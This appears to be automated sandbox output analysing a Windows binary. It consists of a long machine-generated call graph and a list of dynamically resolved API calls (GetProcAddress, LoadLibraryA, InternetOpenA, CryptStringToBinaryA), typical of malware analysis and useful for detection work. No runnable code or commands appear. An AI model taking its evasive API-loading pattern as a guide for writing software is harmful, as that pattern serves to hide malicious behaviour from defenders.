13921->13922 13923 f16455 13922->13923 13924 f1a8a0 lstrcpy 13923->13924 13925 f16467 13924->13925 13926 f1a8a0 lstrcpy 13925->13926 13927 f15b86 13926->13927 13927->13691 13929 f045c0 2 API calls 13928->13929 13930 f026b4 13929->13930 13931 f045c0 2 API calls 13930->13931 13932 f026d7 13931->13932 13933 f045c0 2 API calls 13932->13933 13934 f026f0 13933->13934 13935 f045c0 2 API calls 13934->13935 13936 f02709 13935->13936 13937 f045c0 2 API calls 13936->13937 13938 f02736 13937->13938 13939 f045c0 2 API calls 13938->13939 13940 f0274f 13939->13940 13941 f045c0 2 API calls 13940->13941 13942 f02768 13941->13942 13943 f045c0 2 API calls 13942->13943 13944 f02795 13943->13944 13945 f045c0 2 API calls 13944->13945 13946 f027ae 13945->13946 13947 f045c0 2 API calls 13946->13947 13948 f027c7 13947->13948 13949 f045c0 2 API calls 13948->13949 13950 f027e0 13949->13950 13951 f045c0 2 API calls 13950->13951 13952 f027f9 13951->13952 13953 f045c0 2 API calls 13952->13953 13954 f02812 13953->13954 13955 f045c0 2 API calls 13954->13955 13956 f0282b 13955->13956 13957 f045c0 2 API calls 13956->13957 13958 f02844 13957->13958 13959 f045c0 2 API calls 13958->13959 13960 f0285d 13959->13960 13961 f045c0 2 API calls 13960->13961 13962 f02876 13961->13962 13963 f045c0 2 API calls 13962->13963 13964 f0288f 13963->13964 13965 f045c0 2 API calls 13964->13965 13966 f028a8 13965->13966 13967 f045c0 2 API calls 13966->13967 13968 f028c1 13967->13968 13969 f045c0 2 API calls 13968->13969 13970 f028da 13969->13970 13971 f045c0 2 API calls 13970->13971 13972 f028f3 13971->13972 13973 f045c0 2 API calls 13972->13973 13974 f0290c 13973->13974 13975 f045c0 2 API calls 13974->13975 13976 f02925 13975->13976 13977 f045c0 2 API calls 13976->13977 13978 f0293e 13977->13978 13979 f045c0 2 API calls 13978->13979 13980 f02957 13979->13980 13981 f045c0 2 API calls 13980->13981 13982 f02970 13981->13982 13983 f045c0 2 API calls 13982->13983 13984 f02989 13983->13984 13985 f045c0 2 API calls 
13984->13985 13986 f029a2 13985->13986 13987 f045c0 2 API calls 13986->13987 13988 f029bb 13987->13988 13989 f045c0 2 API calls 13988->13989 13990 f029d4 13989->13990 13991 f045c0 2 API calls 13990->13991 13992 f029ed 13991->13992 13993 f045c0 2 API calls 13992->13993 13994 f02a06 13993->13994 13995 f045c0 2 API calls 13994->13995 13996 f02a1f 13995->13996 13997 f045c0 2 API calls 13996->13997 13998 f02a38 13997->13998 13999 f045c0 2 API calls 13998->13999 14000 f02a51 13999->14000 14001 f045c0 2 API calls 14000->14001 14002 f02a6a 14001->14002 14003 f045c0 2 API calls 14002->14003 14004 f02a83 14003->14004 14005 f045c0 2 API calls 14004->14005 14006 f02a9c 14005->14006 14007 f045c0 2 API calls 14006->14007 14008 f02ab5 14007->14008 14009 f045c0 2 API calls 14008->14009 14010 f02ace 14009->14010 14011 f045c0 2 API calls 14010->14011 14012 f02ae7 14011->14012 14013 f045c0 2 API calls 14012->14013 14014 f02b00 14013->14014 14015 f045c0 2 API calls 14014->14015 14016 f02b19 14015->14016 14017 f045c0 2 API calls 14016->14017 14018 f02b32 14017->14018 14019 f045c0 2 API calls 14018->14019 14020 f02b4b 14019->14020 14021 f045c0 2 API calls 14020->14021 14022 f02b64 14021->14022 14023 f045c0 2 API calls 14022->14023 14024 f02b7d 14023->14024 14025 f045c0 2 API calls 14024->14025 14026 f02b96 14025->14026 14027 f045c0 2 API calls 14026->14027 14028 f02baf 14027->14028 14029 f045c0 2 API calls 14028->14029 14030 f02bc8 14029->14030 14031 f045c0 2 API calls 14030->14031 14032 f02be1 14031->14032 14033 f045c0 2 API calls 14032->14033 14034 f02bfa 14033->14034 14035 f045c0 2 API calls 14034->14035 14036 f02c13 14035->14036 14037 f045c0 2 API calls 14036->14037 14038 f02c2c 14037->14038 14039 f045c0 2 API calls 14038->14039 14040 f02c45 14039->14040 14041 f045c0 2 API calls 14040->14041 14042 f02c5e 14041->14042 14043 f045c0 2 API calls 14042->14043 14044 f02c77 14043->14044 14045 f045c0 2 API calls 14044->14045 14046 f02c90 14045->14046 14047 f045c0 2 API calls 14046->14047 
14048 f02ca9 14047->14048 14049 f045c0 2 API calls 14048->14049 14050 f02cc2 14049->14050 14051 f045c0 2 API calls 14050->14051 14052 f02cdb 14051->14052 14053 f045c0 2 API calls 14052->14053 14054 f02cf4 14053->14054 14055 f045c0 2 API calls 14054->14055 14056 f02d0d 14055->14056 14057 f045c0 2 API calls 14056->14057 14058 f02d26 14057->14058 14059 f045c0 2 API calls 14058->14059 14060 f02d3f 14059->14060 14061 f045c0 2 API calls 14060->14061 14062 f02d58 14061->14062 14063 f045c0 2 API calls 14062->14063 14064 f02d71 14063->14064 14065 f045c0 2 API calls 14064->14065 14066 f02d8a 14065->14066 14067 f045c0 2 API calls 14066->14067 14068 f02da3 14067->14068 14069 f045c0 2 API calls 14068->14069 14070 f02dbc 14069->14070 14071 f045c0 2 API calls 14070->14071 14072 f02dd5 14071->14072 14073 f045c0 2 API calls 14072->14073 14074 f02dee 14073->14074 14075 f045c0 2 API calls 14074->14075 14076 f02e07 14075->14076 14077 f045c0 2 API calls 14076->14077 14078 f02e20 14077->14078 14079 f045c0 2 API calls 14078->14079 14080 f02e39 14079->14080 14081 f045c0 2 API calls 14080->14081 14082 f02e52 14081->14082 14083 f045c0 2 API calls 14082->14083 14084 f02e6b 14083->14084 14085 f045c0 2 API calls 14084->14085 14086 f02e84 14085->14086 14087 f045c0 2 API calls 14086->14087 14088 f02e9d 14087->14088 14089 f045c0 2 API calls 14088->14089 14090 f02eb6 14089->14090 14091 f045c0 2 API calls 14090->14091 14092 f02ecf 14091->14092 14093 f045c0 2 API calls 14092->14093 14094 f02ee8 14093->14094 14095 f045c0 2 API calls 14094->14095 14096 f02f01 14095->14096 14097 f045c0 2 API calls 14096->14097 14098 f02f1a 14097->14098 14099 f045c0 2 API calls 14098->14099 14100 f02f33 14099->14100 14101 f045c0 2 API calls 14100->14101 14102 f02f4c 14101->14102 14103 f045c0 2 API calls 14102->14103 14104 f02f65 14103->14104 14105 f045c0 2 API calls 14104->14105 14106 f02f7e 14105->14106 14107 f045c0 2 API calls 14106->14107 14108 f02f97 14107->14108 14109 f045c0 2 API calls 14108->14109 14110 f02fb0 
14109->14110 14111 f045c0 2 API calls 14110->14111 14112 f02fc9 14111->14112 14113 f045c0 2 API calls 14112->14113 14114 f02fe2 14113->14114 14115 f045c0 2 API calls 14114->14115 14116 f02ffb 14115->14116 14117 f045c0 2 API calls 14116->14117 14118 f03014 14117->14118 14119 f045c0 2 API calls 14118->14119 14120 f0302d 14119->14120 14121 f045c0 2 API calls 14120->14121 14122 f03046 14121->14122 14123 f045c0 2 API calls 14122->14123 14124 f0305f 14123->14124 14125 f045c0 2 API calls 14124->14125 14126 f03078 14125->14126 14127 f045c0 2 API calls 14126->14127 14128 f03091 14127->14128 14129 f045c0 2 API calls 14128->14129 14130 f030aa 14129->14130 14131 f045c0 2 API calls 14130->14131 14132 f030c3 14131->14132 14133 f045c0 2 API calls 14132->14133 14134 f030dc 14133->14134 14135 f045c0 2 API calls 14134->14135 14136 f030f5 14135->14136 14137 f045c0 2 API calls 14136->14137 14138 f0310e 14137->14138 14139 f045c0 2 API calls 14138->14139 14140 f03127 14139->14140 14141 f045c0 2 API calls 14140->14141 14142 f03140 14141->14142 14143 f045c0 2 API calls 14142->14143 14144 f03159 14143->14144 14145 f045c0 2 API calls 14144->14145 14146 f03172 14145->14146 14147 f045c0 2 API calls 14146->14147 14148 f0318b 14147->14148 14149 f045c0 2 API calls 14148->14149 14150 f031a4 14149->14150 14151 f045c0 2 API calls 14150->14151 14152 f031bd 14151->14152 14153 f045c0 2 API calls 14152->14153 14154 f031d6 14153->14154 14155 f045c0 2 API calls 14154->14155 14156 f031ef 14155->14156 14157 f045c0 2 API calls 14156->14157 14158 f03208 14157->14158 14159 f045c0 2 API calls 14158->14159 14160 f03221 14159->14160 14161 f045c0 2 API calls 14160->14161 14162 f0323a 14161->14162 14163 f045c0 2 API calls 14162->14163 14164 f03253 14163->14164 14165 f045c0 2 API calls 14164->14165 14166 f0326c 14165->14166 14167 f045c0 2 API calls 14166->14167 14168 f03285 14167->14168 14169 f045c0 2 API calls 14168->14169 14170 f0329e 14169->14170 14171 f045c0 2 API calls 14170->14171 14172 f032b7 14171->14172 
14173 f045c0 2 API calls 14172->14173 14174 f032d0 14173->14174 14175 f045c0 2 API calls 14174->14175 14176 f032e9 14175->14176 14177 f045c0 2 API calls 14176->14177 14178 f03302 14177->14178 14179 f045c0 2 API calls 14178->14179 14180 f0331b 14179->14180 14181 f045c0 2 API calls 14180->14181 14182 f03334 14181->14182 14183 f045c0 2 API calls 14182->14183 14184 f0334d 14183->14184 14185 f045c0 2 API calls 14184->14185 14186 f03366 14185->14186 14187 f045c0 2 API calls 14186->14187 14188 f0337f 14187->14188 14189 f045c0 2 API calls 14188->14189 14190 f03398 14189->14190 14191 f045c0 2 API calls 14190->14191 14192 f033b1 14191->14192 14193 f045c0 2 API calls 14192->14193 14194 f033ca 14193->14194 14195 f045c0 2 API calls 14194->14195 14196 f033e3 14195->14196 14197 f045c0 2 API calls 14196->14197 14198 f033fc 14197->14198 14199 f045c0 2 API calls 14198->14199 14200 f03415 14199->14200 14201 f045c0 2 API calls 14200->14201 14202 f0342e 14201->14202 14203 f045c0 2 API calls 14202->14203 14204 f03447 14203->14204 14205 f045c0 2 API calls 14204->14205 14206 f03460 14205->14206 14207 f045c0 2 API calls 14206->14207 14208 f03479 14207->14208 14209 f045c0 2 API calls 14208->14209 14210 f03492 14209->14210 14211 f045c0 2 API calls 14210->14211 14212 f034ab 14211->14212 14213 f045c0 2 API calls 14212->14213 14214 f034c4 14213->14214 14215 f045c0 2 API calls 14214->14215 14216 f034dd 14215->14216 14217 f045c0 2 API calls 14216->14217 14218 f034f6 14217->14218 14219 f045c0 2 API calls 14218->14219 14220 f0350f 14219->14220 14221 f045c0 2 API calls 14220->14221 14222 f03528 14221->14222 14223 f045c0 2 API calls 14222->14223 14224 f03541 14223->14224 14225 f045c0 2 API calls 14224->14225 14226 f0355a 14225->14226 14227 f045c0 2 API calls 14226->14227 14228 f03573 14227->14228 14229 f045c0 2 API calls 14228->14229 14230 f0358c 14229->14230 14231 f045c0 2 API calls 14230->14231 14232 f035a5 14231->14232 14233 f045c0 2 API calls 14232->14233 14234 f035be 14233->14234 14235 f045c0 2 
API calls 14234->14235 14236 f035d7 14235->14236 14237 f045c0 2 API calls 14236->14237 14238 f035f0 14237->14238 14239 f045c0 2 API calls 14238->14239 14240 f03609 14239->14240 14241 f045c0 2 API calls 14240->14241 14242 f03622 14241->14242 14243 f045c0 2 API calls 14242->14243 14244 f0363b 14243->14244 14245 f045c0 2 API calls 14244->14245 14246 f03654 14245->14246 14247 f045c0 2 API calls 14246->14247 14248 f0366d 14247->14248 14249 f045c0 2 API calls 14248->14249 14250 f03686 14249->14250 14251 f045c0 2 API calls 14250->14251 14252 f0369f 14251->14252 14253 f045c0 2 API calls 14252->14253 14254 f036b8 14253->14254 14255 f045c0 2 API calls 14254->14255 14256 f036d1 14255->14256 14257 f045c0 2 API calls 14256->14257 14258 f036ea 14257->14258 14259 f045c0 2 API calls 14258->14259 14260 f03703 14259->14260 14261 f045c0 2 API calls 14260->14261 14262 f0371c 14261->14262 14263 f045c0 2 API calls 14262->14263 14264 f03735 14263->14264 14265 f045c0 2 API calls 14264->14265 14266 f0374e 14265->14266 14267 f045c0 2 API calls 14266->14267 14268 f03767 14267->14268 14269 f045c0 2 API calls 14268->14269 14270 f03780 14269->14270 14271 f045c0 2 API calls 14270->14271 14272 f03799 14271->14272 14273 f045c0 2 API calls 14272->14273 14274 f037b2 14273->14274 14275 f045c0 2 API calls 14274->14275 14276 f037cb 14275->14276 14277 f045c0 2 API calls 14276->14277 14278 f037e4 14277->14278 14279 f045c0 2 API calls 14278->14279 14280 f037fd 14279->14280 14281 f045c0 2 API calls 14280->14281 14282 f03816 14281->14282 14283 f045c0 2 API calls 14282->14283 14284 f0382f 14283->14284 14285 f045c0 2 API calls 14284->14285 14286 f03848 14285->14286 14287 f045c0 2 API calls 14286->14287 14288 f03861 14287->14288 14289 f045c0 2 API calls 14288->14289 14290 f0387a 14289->14290 14291 f045c0 2 API calls 14290->14291 14292 f03893 14291->14292 14293 f045c0 2 API calls 14292->14293 14294 f038ac 14293->14294 14295 f045c0 2 API calls 14294->14295 14296 f038c5 14295->14296 14297 f045c0 2 API calls 
14296->14297 14298 f038de 14297->14298 14299 f045c0 2 API calls 14298->14299 14300 f038f7 14299->14300 14301 f045c0 2 API calls 14300->14301 14302 f03910 14301->14302 14303 f045c0 2 API calls 14302->14303 14304 f03929 14303->14304 14305 f045c0 2 API calls 14304->14305 14306 f03942 14305->14306 14307 f045c0 2 API calls 14306->14307 14308 f0395b 14307->14308 14309 f045c0 2 API calls 14308->14309 14310 f03974 14309->14310 14311 f045c0 2 API calls 14310->14311 14312 f0398d 14311->14312 14313 f045c0 2 API calls 14312->14313 14314 f039a6 14313->14314 14315 f045c0 2 API calls 14314->14315 14316 f039bf 14315->14316 14317 f045c0 2 API calls 14316->14317 14318 f039d8 14317->14318 14319 f045c0 2 API calls 14318->14319 14320 f039f1 14319->14320 14321 f045c0 2 API calls 14320->14321 14322 f03a0a 14321->14322 14323 f045c0 2 API calls 14322->14323 14324 f03a23 14323->14324 14325 f045c0 2 API calls 14324->14325 14326 f03a3c 14325->14326 14327 f045c0 2 API calls 14326->14327 14328 f03a55 14327->14328 14329 f045c0 2 API calls 14328->14329 14330 f03a6e 14329->14330 14331 f045c0 2 API calls 14330->14331 14332 f03a87 14331->14332 14333 f045c0 2 API calls 14332->14333 14334 f03aa0 14333->14334 14335 f045c0 2 API calls 14334->14335 14336 f03ab9 14335->14336 14337 f045c0 2 API calls 14336->14337 14338 f03ad2 14337->14338 14339 f045c0 2 API calls 14338->14339 14340 f03aeb 14339->14340 14341 f045c0 2 API calls 14340->14341 14342 f03b04 14341->14342 14343 f045c0 2 API calls 14342->14343 14344 f03b1d 14343->14344 14345 f045c0 2 API calls 14344->14345 14346 f03b36 14345->14346 14347 f045c0 2 API calls 14346->14347 14348 f03b4f 14347->14348 14349 f045c0 2 API calls 14348->14349 14350 f03b68 14349->14350 14351 f045c0 2 API calls 14350->14351 14352 f03b81 14351->14352 14353 f045c0 2 API calls 14352->14353 14354 f03b9a 14353->14354 14355 f045c0 2 API calls 14354->14355 14356 f03bb3 14355->14356 14357 f045c0 2 API calls 14356->14357 14358 f03bcc 14357->14358 14359 f045c0 2 API calls 14358->14359 
14360 f03be5 14359->14360 14361 f045c0 2 API calls 14360->14361 14362 f03bfe 14361->14362 14363 f045c0 2 API calls 14362->14363 14364 f03c17 14363->14364 14365 f045c0 2 API calls 14364->14365 14366 f03c30 14365->14366 14367 f045c0 2 API calls 14366->14367 14368 f03c49 14367->14368 14369 f045c0 2 API calls 14368->14369 14370 f03c62 14369->14370 14371 f045c0 2 API calls 14370->14371 14372 f03c7b 14371->14372 14373 f045c0 2 API calls 14372->14373 14374 f03c94 14373->14374 14375 f045c0 2 API calls 14374->14375 14376 f03cad 14375->14376 14377 f045c0 2 API calls 14376->14377 14378 f03cc6 14377->14378 14379 f045c0 2 API calls 14378->14379 14380 f03cdf 14379->14380 14381 f045c0 2 API calls 14380->14381 14382 f03cf8 14381->14382 14383 f045c0 2 API calls 14382->14383 14384 f03d11 14383->14384 14385 f045c0 2 API calls 14384->14385 14386 f03d2a 14385->14386 14387 f045c0 2 API calls 14386->14387 14388 f03d43 14387->14388 14389 f045c0 2 API calls 14388->14389 14390 f03d5c 14389->14390 14391 f045c0 2 API calls 14390->14391 14392 f03d75 14391->14392 14393 f045c0 2 API calls 14392->14393 14394 f03d8e 14393->14394 14395 f045c0 2 API calls 14394->14395 14396 f03da7 14395->14396 14397 f045c0 2 API calls 14396->14397 14398 f03dc0 14397->14398 14399 f045c0 2 API calls 14398->14399 14400 f03dd9 14399->14400 14401 f045c0 2 API calls 14400->14401 14402 f03df2 14401->14402 14403 f045c0 2 API calls 14402->14403 14404 f03e0b 14403->14404 14405 f045c0 2 API calls 14404->14405 14406 f03e24 14405->14406 14407 f045c0 2 API calls 14406->14407 14408 f03e3d 14407->14408 14409 f045c0 2 API calls 14408->14409 14410 f03e56 14409->14410 14411 f045c0 2 API calls 14410->14411 14412 f03e6f 14411->14412 14413 f045c0 2 API calls 14412->14413 14414 f03e88 14413->14414 14415 f045c0 2 API calls 14414->14415 14416 f03ea1 14415->14416 14417 f045c0 2 API calls 14416->14417 14418 f03eba 14417->14418 14419 f045c0 2 API calls 14418->14419 14420 f03ed3 14419->14420 14421 f045c0 2 API calls 14420->14421 14422 f03eec 
14421->14422 14423 f045c0 2 API calls 14422->14423 14424 f03f05 14423->14424 14425 f045c0 2 API calls 14424->14425 14426 f03f1e 14425->14426 14427 f045c0 2 API calls 14426->14427 14428 f03f37 14427->14428 14429 f045c0 2 API calls 14428->14429 14430 f03f50 14429->14430 14431 f045c0 2 API calls 14430->14431 14432 f03f69 14431->14432 14433 f045c0 2 API calls 14432->14433 14434 f03f82 14433->14434 14435 f045c0 2 API calls 14434->14435 14436 f03f9b 14435->14436 14437 f045c0 2 API calls 14436->14437 14438 f03fb4 14437->14438 14439 f045c0 2 API calls 14438->14439 14440 f03fcd 14439->14440 14441 f045c0 2 API calls 14440->14441 14442 f03fe6 14441->14442 14443 f045c0 2 API calls 14442->14443 14444 f03fff 14443->14444 14445 f045c0 2 API calls 14444->14445 14446 f04018 14445->14446 14447 f045c0 2 API calls 14446->14447 14448 f04031 14447->14448 14449 f045c0 2 API calls 14448->14449 14450 f0404a 14449->14450 14451 f045c0 2 API calls 14450->14451 14452 f04063 14451->14452 14453 f045c0 2 API calls 14452->14453 14454 f0407c 14453->14454 14455 f045c0 2 API calls 14454->14455 14456 f04095 14455->14456 14457 f045c0 2 API calls 14456->14457 14458 f040ae 14457->14458 14459 f045c0 2 API calls 14458->14459 14460 f040c7 14459->14460 14461 f045c0 2 API calls 14460->14461 14462 f040e0 14461->14462 14463 f045c0 2 API calls 14462->14463 14464 f040f9 14463->14464 14465 f045c0 2 API calls 14464->14465 14466 f04112 14465->14466 14467 f045c0 2 API calls 14466->14467 14468 f0412b 14467->14468 14469 f045c0 2 API calls 14468->14469 14470 f04144 14469->14470 14471 f045c0 2 API calls 14470->14471 14472 f0415d 14471->14472 14473 f045c0 2 API calls 14472->14473 14474 f04176 14473->14474 14475 f045c0 2 API calls 14474->14475 14476 f0418f 14475->14476 14477 f045c0 2 API calls 14476->14477 14478 f041a8 14477->14478 14479 f045c0 2 API calls 14478->14479 14480 f041c1 14479->14480 14481 f045c0 2 API calls 14480->14481 14482 f041da 14481->14482 14483 f045c0 2 API calls 14482->14483 14484 f041f3 14483->14484 
14485 f045c0 2 API calls 14484->14485 14486 f0420c 14485->14486 14487 f045c0 2 API calls 14486->14487 14488 f04225 14487->14488 14489 f045c0 2 API calls 14488->14489 14490 f0423e 14489->14490 14491 f045c0 2 API calls 14490->14491 14492 f04257 14491->14492 14493 f045c0 2 API calls 14492->14493 14494 f04270 14493->14494 14495 f045c0 2 API calls 14494->14495 14496 f04289 14495->14496 14497 f045c0 2 API calls 14496->14497 14498 f042a2 14497->14498 14499 f045c0 2 API calls 14498->14499 14500 f042bb 14499->14500 14501 f045c0 2 API calls 14500->14501 14502 f042d4 14501->14502 14503 f045c0 2 API calls 14502->14503 14504 f042ed 14503->14504 14505 f045c0 2 API calls 14504->14505 14506 f04306 14505->14506 14507 f045c0 2 API calls 14506->14507 14508 f0431f 14507->14508 14509 f045c0 2 API calls 14508->14509 14510 f04338 14509->14510 14511 f045c0 2 API calls 14510->14511 14512 f04351 14511->14512 14513 f045c0 2 API calls 14512->14513 14514 f0436a 14513->14514 14515 f045c0 2 API calls 14514->14515 14516 f04383 14515->14516 14517 f045c0 2 API calls 14516->14517 14518 f0439c 14517->14518 14519 f045c0 2 API calls 14518->14519 14520 f043b5 14519->14520 14521 f045c0 2 API calls 14520->14521 14522 f043ce 14521->14522 14523 f045c0 2 API calls 14522->14523 14524 f043e7 14523->14524 14525 f045c0 2 API calls 14524->14525 14526 f04400 14525->14526 14527 f045c0 2 API calls 14526->14527 14528 f04419 14527->14528 14529 f045c0 2 API calls 14528->14529 14530 f04432 14529->14530 14531 f045c0 2 API calls 14530->14531 14532 f0444b 14531->14532 14533 f045c0 2 API calls 14532->14533 14534 f04464 14533->14534 14535 f045c0 2 API calls 14534->14535 14536 f0447d 14535->14536 14537 f045c0 2 API calls 14536->14537 14538 f04496 14537->14538 14539 f045c0 2 API calls 14538->14539 14540 f044af 14539->14540 14541 f045c0 2 API calls 14540->14541 14542 f044c8 14541->14542 14543 f045c0 2 API calls 14542->14543 14544 f044e1 14543->14544 14545 f045c0 2 API calls 14544->14545 14546 f044fa 14545->14546 14547 f045c0 2 
API calls 14546->14547 14548 f04513 14547->14548 14549 f045c0 2 API calls 14548->14549 14550 f0452c 14549->14550 14551 f045c0 2 API calls 14550->14551 14552 f04545 14551->14552 14553 f045c0 2 API calls 14552->14553 14554 f0455e 14553->14554 14555 f045c0 2 API calls 14554->14555 14556 f04577 14555->14556 14557 f045c0 2 API calls 14556->14557 14558 f04590 14557->14558 14559 f045c0 2 API calls 14558->14559 14560 f045a9 14559->14560 14561 f19c10 14560->14561 14562 f19c20 43 API calls 14561->14562 14563 f1a036 8 API calls 14561->14563 14562->14563 14564 f1a146 14563->14564 14565 f1a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14563->14565 14566 f1a153 8 API calls 14564->14566 14567 f1a216 14564->14567 14565->14564 14566->14567 14568 f1a298 14567->14568 14569 f1a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14567->14569 14570 f1a2a5 6 API calls 14568->14570 14571 f1a337 14568->14571 14569->14568 14570->14571 14572 f1a344 9 API calls 14571->14572 14573 f1a41f 14571->14573 14572->14573 14574 f1a4a2 14573->14574 14575 f1a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14573->14575 14576 f1a4ab GetProcAddress GetProcAddress 14574->14576 14577 f1a4dc 14574->14577 14575->14574 14576->14577 14578 f1a515 14577->14578 14579 f1a4e5 GetProcAddress GetProcAddress 14577->14579 14580 f1a612 14578->14580 14581 f1a522 10 API calls 14578->14581 14579->14578 14582 f1a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14580->14582 14583 f1a67d 14580->14583 14581->14580 14582->14583 14584 f1a686 GetProcAddress 14583->14584 14585 f1a69e 14583->14585 14584->14585 14586 f1a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14585->14586 14587 f15ca3 14585->14587 14586->14587 14588 f01590 14587->14588 15709 f01670 14588->15709 14591 f1a7a0 lstrcpy 14592 f015b5 14591->14592 14593 f1a7a0 lstrcpy 14592->14593 14594 f015c7 14593->14594 14595 f1a7a0 lstrcpy 14594->14595 14596 
f015d9 14595->14596 14597 f1a7a0 lstrcpy 14596->14597 14598 f01663 14597->14598 14599 f15510 14598->14599 14600 f15521 14599->14600 14601 f1a820 2 API calls 14600->14601 14602 f1552e 14601->14602 14603 f1a820 2 API calls 14602->14603 14604 f1553b 14603->14604 14605 f1a820 2 API calls 14604->14605 14606 f15548 14605->14606 14607 f1a740 lstrcpy 14606->14607 14608 f15555 14607->14608 14609 f1a740 lstrcpy 14608->14609 14610 f15562 14609->14610 14611 f1a740 lstrcpy 14610->14611 14612 f1556f 14611->14612 14613 f1a740 lstrcpy 14612->14613 14639 f1557c 14613->14639 14614 f1a7a0 lstrcpy 14614->14639 14615 f15643 StrCmpCA 14615->14639 14616 f156a0 StrCmpCA 14617 f157dc 14616->14617 14616->14639 14618 f1a8a0 lstrcpy 14617->14618 14619 f157e8 14618->14619 14620 f1a820 2 API calls 14619->14620 14622 f157f6 14620->14622 14621 f15856 StrCmpCA 14624 f15991 14621->14624 14621->14639 14623 f1a820 2 API calls 14622->14623 14626 f15805 14623->14626 14627 f1a8a0 lstrcpy 14624->14627 14625 f1a740 lstrcpy 14625->14639 14628 f01670 lstrcpy 14626->14628 14630 f1599d 14627->14630 14653 f15811 14628->14653 14629 f01590 lstrcpy 14629->14639 14632 f1a820 2 API calls 14630->14632 14631 f1a820 lstrlen lstrcpy 14631->14639 14633 f159ab 14632->14633 14636 f1a820 2 API calls 14633->14636 14634 f15a0b StrCmpCA 14637 f15a16 Sleep 14634->14637 14638 f15a28 14634->14638 14635 f152c0 25 API calls 14635->14639 14640 f159ba 14636->14640 14637->14639 14641 f1a8a0 lstrcpy 14638->14641 14639->14614 14639->14615 14639->14616 14639->14621 14639->14625 14639->14629 14639->14631 14639->14634 14639->14635 14648 f1a8a0 lstrcpy 14639->14648 14649 f1578a StrCmpCA 14639->14649 14651 f1593f StrCmpCA 14639->14651 14652 f151f0 20 API calls 14639->14652 14642 f01670 lstrcpy 14640->14642 14643 f15a34 14641->14643 14642->14653 14644 f1a820 2 API calls 14643->14644 14645 f15a43 14644->14645 14646 f1a820 2 API calls 14645->14646 14647 f15a52 14646->14647 14650 f01670 lstrcpy 14647->14650 14648->14639 14649->14639 
14650->14653 14651->14639 14652->14639 14653->13706 14655 f17553 GetVolumeInformationA 14654->14655 14656 f1754c 14654->14656 14657 f17591 14655->14657 14656->14655 14658 f175fc GetProcessHeap RtlAllocateHeap 14657->14658 14659 f17619 14658->14659 14660 f17628 wsprintfA 14658->14660 14661 f1a740 lstrcpy 14659->14661 14662 f1a740 lstrcpy 14660->14662 14663 f15da7 14661->14663 14662->14663 14663->13727 14665 f1a7a0 lstrcpy 14664->14665 14666 f04899 14665->14666 15718 f047b0 14666->15718 14668 f048a5 14669 f1a740 lstrcpy 14668->14669 14670 f048d7 14669->14670 14671 f1a740 lstrcpy 14670->14671 14672 f048e4 14671->14672 14673 f1a740 lstrcpy 14672->14673 14674 f048f1 14673->14674 14675 f1a740 lstrcpy 14674->14675 14676 f048fe 14675->14676 14677 f1a740 lstrcpy 14676->14677 14678 f0490b InternetOpenA StrCmpCA 14677->14678 14679 f04944 14678->14679 14680 f04ecb InternetCloseHandle 14679->14680 15724 f18b60 14679->15724 14681 f04ee8 14680->14681 15739 f09ac0 CryptStringToBinaryA 14681->15739 14683 f04963 15732 f1a920 14683->15732 14686 f04976 14688 f1a8a0 lstrcpy 14686->14688 14693 f0497f 14688->14693 14689 f1a820 2 API calls 14690 f04f05 14689->14690 14691 f1a9b0 4 API calls 14690->14691 14694 f04f1b 14691->14694 14692 f04f27 ctype 14695 f1a7a0 lstrcpy 14692->14695 14697 f1a9b0 4 API calls 14693->14697 14696 f1a8a0 lstrcpy 14694->14696 14708 f04f57 14695->14708 14696->14692 14698 f049a9 14697->14698 14699 f1a8a0 lstrcpy 14698->14699 14700 f049b2 14699->14700 14701 f1a9b0 4 API calls 14700->14701 14702 f049d1 14701->14702 14703 f1a8a0 lstrcpy 14702->14703 14704 f049da 14703->14704 14705 f1a920 3 API calls 14704->14705 14706 f049f8 14705->14706 14707 f1a8a0 lstrcpy 14706->14707 14709 f04a01 14707->14709 14708->13730 14710 f1a9b0 4 API calls 14709->14710 14711 f04a20 14710->14711 14712 f1a8a0 lstrcpy 14711->14712 14713 f04a29 14712->14713 14714 f1a9b0 4 API calls 14713->14714 14715 f04a48 14714->14715 14716 f1a8a0 lstrcpy 14715->14716 14717 f04a51 14716->14717 14718 f1a9b0 4 

                        Control-flow Graph (function f19860-f19bc2: call f19750, GetProcAddress * 21, LoadLibraryA * 5, further GetProcAddress calls; graph edge data omitted)
                        APIs
                        • GetProcAddress.KERNEL32(75900000,008A14E0), ref: 00F198A1
                        • GetProcAddress.KERNEL32(75900000,008A16D8), ref: 00F198BA
                        • GetProcAddress.KERNEL32(75900000,008A16F0), ref: 00F198D2
                        • GetProcAddress.KERNEL32(75900000,008A1708), ref: 00F198EA
                        • GetProcAddress.KERNEL32(75900000,008A1558), ref: 00F19903
                        • GetProcAddress.KERNEL32(75900000,008A97F0), ref: 00F1991B
                        • GetProcAddress.KERNEL32(75900000,00896900), ref: 00F19933
                        • GetProcAddress.KERNEL32(75900000,00896740), ref: 00F1994C
                        • GetProcAddress.KERNEL32(75900000,008A1720), ref: 00F19964
                        • GetProcAddress.KERNEL32(75900000,008A1738), ref: 00F1997C
                        • GetProcAddress.KERNEL32(75900000,008A1780), ref: 00F19995
                        • GetProcAddress.KERNEL32(75900000,008A1798), ref: 00F199AD
                        • GetProcAddress.KERNEL32(75900000,00896700), ref: 00F199C5
                        • GetProcAddress.KERNEL32(75900000,008A17B0), ref: 00F199DE
                        • GetProcAddress.KERNEL32(75900000,008A14F8), ref: 00F199F6
                        • GetProcAddress.KERNEL32(75900000,008968E0), ref: 00F19A0E
                        • GetProcAddress.KERNEL32(75900000,008A1510), ref: 00F19A27
                        • GetProcAddress.KERNEL32(75900000,008A1810), ref: 00F19A3F
                        • GetProcAddress.KERNEL32(75900000,00896800), ref: 00F19A57
                        • GetProcAddress.KERNEL32(75900000,008A17E0), ref: 00F19A70
                        • GetProcAddress.KERNEL32(75900000,00896680), ref: 00F19A88
                        • LoadLibraryA.KERNEL32(008A17F8,?,00F16A00), ref: 00F19A9A
                        • LoadLibraryA.KERNEL32(008A1870,?,00F16A00), ref: 00F19AAB
                        • LoadLibraryA.KERNEL32(008A1888,?,00F16A00), ref: 00F19ABD
                        • LoadLibraryA.KERNEL32(008A1828,?,00F16A00), ref: 00F19ACF
                        • LoadLibraryA.KERNEL32(008A17C8,?,00F16A00), ref: 00F19AE0
